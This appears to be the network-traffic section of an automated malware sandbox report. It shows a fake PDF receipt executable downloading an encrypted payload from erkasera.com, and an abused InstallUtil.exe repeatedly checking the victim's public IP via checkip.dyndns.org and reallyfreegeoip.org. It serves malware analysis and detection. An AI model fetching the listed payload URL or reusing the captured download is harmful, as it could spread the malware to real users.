Oct 28, 2024 19:04:15.965699911 CET	1.1.1.1	192.168.2.4	0xac19	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:15.965699911 CET	1.1.1.1	192.168.2.4	0xac19	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:15.965699911 CET	1.1.1.1	192.168.2.4	0xac19	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:15.965699911 CET	1.1.1.1	192.168.2.4	0xac19	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:15.965699911 CET	1.1.1.1	192.168.2.4	0xac19	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:17.190368891 CET	1.1.1.1	192.168.2.4	0x1d7c	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 19:04:17.190368891 CET	1.1.1.1	192.168.2.4	0x1d7c	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

erkasera.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:15.980616093 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:16.857008934 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1c469145d7445e6ef915e705d4ab6623 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 19:04:16.861835957 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 19:04:17.124233007 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f651155ea3ac9e8e614ababdd4c8a608 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 19:04:18.096709967 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 19:04:18.357861042 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e39aefabbdbd2cf3310e8eff3b1db579 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:19.133683920 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 19:04:20.013550997 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 25295319dd5879369d35aaa76a4cb4ee Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:20.833590031 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:21.702743053 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 884ed70787d8f4f7bbb4c04cc9a62664 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:22.546587944 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:23.419681072 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a7e6508fc5e2875cc51f44569e9d89cb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:24.273741007 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:25.148843050 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 955107858372f02cfeb339103777209d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:25.955662966 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:26.820468903 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:26 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e32b6f49688b9f5bf626d18166b3d439 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	132.226.247.73	80	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:27.671659946 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:28.531817913 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8a9b2071c4710e1b84b8961f0afdef0a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:34.060961008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:34.912925959 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 07e04549ffe3657539ba837c37ffafcd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 19:04:34.917491913 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 19:04:35.172844887 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:35 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 77e4c0ebb84e84cac234faa278f80693 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 19:04:36.081614017 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 19:04:36.338349104 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 412efe54f1e0a2fb118326c957fee217 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:37.165872097 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 19:04:38.034620047 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:37 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fb4b5b0cb6186201a8cd7c2f20551c99 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:38.856770992 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:39.731909037 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 91bc21a9f6fc193a2da12df36a7a153b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:40.544444084 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:41.401293039 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:41 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6269c42f1915d37acc08c35986293931 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:42.224889040 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:43.099031925 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:42 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 64682158e50305ac833c0b13e765f4a7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:43.867958069 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:44.730232954 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:44 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 459cc240bddc5db788945ff6dc47b71e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	132.226.247.73	80	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 19:04:45.505220890 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 19:04:46.404679060 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:46 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8dddc50093a27483833d30afc08ef2a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.132.193.46	443	7304	C:\Users\user\Desktop\dekont_001.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:08 UTC	82	OUT	GET /ruurew/Ktanfonto.vdf HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-10-28 18:04:09 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Mon, 28 Oct 2024 08:35:54 GMT accept-ranges: bytes content-length: 951816 date: Mon, 28 Oct 2024 18:03:49 GMT
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: b5 30 53 71 d9 b0 bb e6 c7 4f 73 de a1 77 c2 18 46 1d 6f 68 a7 c7 29 fd 10 02 98 2c 17 85 15 8b 81 3e 15 09 00 75 9b 2a 19 c5 15 44 cd 97 d8 ff 5f d3 7a 5a 8b 3a a2 07 a4 29 f8 58 62 bd e7 7c 04 36 99 9a 2d f1 ce 35 2d a6 01 13 1f 59 dd 49 7c a8 cc c8 e8 51 80 85 68 2f de 35 f5 a4 f0 fa bb c1 6b f4 53 5a b1 19 cb a2 be 15 db 2c db 4d 24 ce fc 77 79 48 1d 83 07 95 d4 8b da 84 af cc 64 d1 58 81 2b f5 9f ff 71 29 d0 79 e3 d1 c2 89 0e ed 00 3a 4b a9 36 5e 64 96 b1 50 6d 69 c0 11 6e 9d b4 9e ad f6 3e 5b 9f 95 6c 5a da 79 49 3e df 83 0c a2 df 36 c0 cb 85 2e df cc 50 ba 0f 0d 19 08 11 e9 70 fc 97 a9 f0 b2 35 db 8a 3f e3 73 17 ce a7 e0 f4 67 14 1e a1 72 44 0b 3b 22 21 15 01 ac 2e 47 48 06 4c 8b ed 89 32 a4 ee a5 03 50 1f e6 b3 e2 79 d0 19 16 7b 5b 4b 4e d4 76 d2 Data Ascii: 0SqOswFoh),>u*D_zZ:)Xb\|6-5-YI\|Qh/5kSZ,M$wyHdX+q)y:K6^dPmin>[lZyI>6.Pp5?sgrD;"!.GHL2Py{[KNv
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: e8 5b f3 98 00 3b c1 2d 66 47 45 3a 0b 89 d5 7b 3a df b0 7a ad 1f 30 12 a0 5f a2 be 98 72 1d d9 2b 77 ba 3b 36 c6 73 88 cf ac f7 d2 96 6f ff 50 14 bf 4f b3 f8 e2 16 ac ce 74 15 56 57 2a f7 02 2e 10 56 33 85 5e ab 1e 0d 78 e5 8e b5 94 90 f3 82 bc e1 87 f8 63 c6 b5 a8 94 d4 f5 94 9a a5 43 40 13 bd 86 7e 46 3f 37 83 23 01 00 a1 72 82 19 f8 86 f1 46 65 b3 30 aa 3e e9 79 77 37 8f b1 c1 50 b5 83 c8 8a b6 dd bb 4f 0a ff 9d 1d 0a 56 15 0c bb 08 23 e6 9a 85 0c fb 92 88 0f 92 70 a0 a2 8b 92 45 25 2c 9c 33 c0 11 a6 a8 5f 49 6f 8d e6 83 3c ec c0 08 ad ce 3a 63 a4 53 ed e1 c7 a7 15 1e fc 70 ee c7 40 2c c9 67 bd 8d bc 90 04 4a 8b a4 1c 91 88 36 31 2d 24 d6 f6 8d 26 f0 a7 71 53 58 5e 67 cc b1 28 c0 05 ec 6b b5 d6 d5 fb 2f 58 84 4a b2 0c a4 c3 e0 d5 11 46 aa 17 d6 08 56 Data Ascii: [;-fGE:{:z0_r+w;6soPOtVW*.V3^xcC@~F?7#rFe0>yw7POV#pE%,3_Io<:cSp@,gJ61-$&qSX^g(k/XJFV
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: 4d b4 8a f1 c4 46 7d 5f f0 5e cc 3c 1c c4 c0 61 99 85 c1 a9 16 3b 02 d2 a2 9c 42 ed 7c 88 c0 d2 6b f8 7c 8d 3c 08 5e 8e 54 c4 fa 5d a7 7c 9a 54 43 de 73 80 a1 15 90 8c 7b 01 ce c9 c4 77 4b 51 8d 41 db 9e 62 09 06 d8 6f b4 da c6 20 02 b6 83 7c ef 7b c5 08 85 15 50 d0 2c fd 47 ed e0 05 0c f4 6d bd 61 b7 0e 1c e4 7f f7 00 7d 0a 21 c6 7f e0 de a8 3f 36 ab 35 03 a6 c1 01 27 fa 5f d9 66 22 10 23 15 7d 08 1a dc 49 34 07 e4 bf 5d 93 ef 9d 4d 2c 25 b7 3e 84 22 45 3a 7a ff dd d4 19 c5 a1 91 ec a5 fc 81 af 9e 21 a0 50 a1 21 c5 be 8b 4b cb 77 76 96 34 29 b5 5f e3 3f 9d 50 8b e9 37 c3 65 a6 0e 5c 8a 89 47 bd fd d5 21 c3 06 3a ba 2e c6 85 ea 47 55 b4 3f 67 47 9b a5 24 9b 95 cd 8e 16 aa 24 f7 4c 45 a6 ad 67 b6 bd 31 d5 0c ed 46 85 b4 e2 70 9e fe 11 80 73 23 ea 67 81 a1 Data Ascii: MF}_^<a;B\|k\|<^T]\|TCs{wKQAbo 